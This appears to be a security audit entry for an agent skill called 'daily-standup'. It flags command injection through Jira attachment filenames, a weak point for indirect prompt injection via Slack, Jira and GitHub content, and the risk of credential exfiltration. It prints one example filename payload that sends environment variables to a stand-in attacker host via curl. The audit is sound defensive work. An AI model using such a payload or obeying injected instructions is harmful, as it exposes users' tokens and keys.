The Agent Skills Directory

[COMMAND_EXECUTION]: The shell command template provided in Step 2 for downloading Jira attachments is vulnerable to command injection. The --output path directly uses the $FILENAME variable, which is sourced from Jira attachment metadata. An attacker (or malicious teammate) could upload an attachment with a filename containing shell metacharacters (e.g., "; curl attacker.com/$(env | base64); #.png") to execute arbitrary commands and potentially exfiltrate sensitive environment variables when the agent processes the attachments.- [PROMPT_INJECTION]: This skill possesses a significant attack surface for indirect prompt injection (Category 8) as it processes data from several untrusted external sources. Ingestion points: Slack conversation history, Jira issue summaries/comments, Jira attachments (via vision), and GitHub PR data. Boundary markers: Absent. The instructions do not provide delimiters or warnings to ignore instructions embedded in the external text. Capability inventory: The skill has access to shell execution (acli, gh, curl), file system operations (mkdir, rm, ls, cat), and multimodal vision processing. Sanitization: None. The agent is instructed to interpret the conversation arc and visual evidence, allowing malicious instructions in comments to manipulate task prioritization, tiering, or the reported context.- [DATA_EXFILTRATION]: The skill handles sensitive credentials via environment variables (JIRA_API_TOKEN, JIRA_EMAIL). The previously identified command injection vulnerability in the attachment download logic allows an attacker to execute commands that could exfiltrate these tokens, or other sensitive local files such as SSH keys or AWS configuration, to an external server.

daily-standup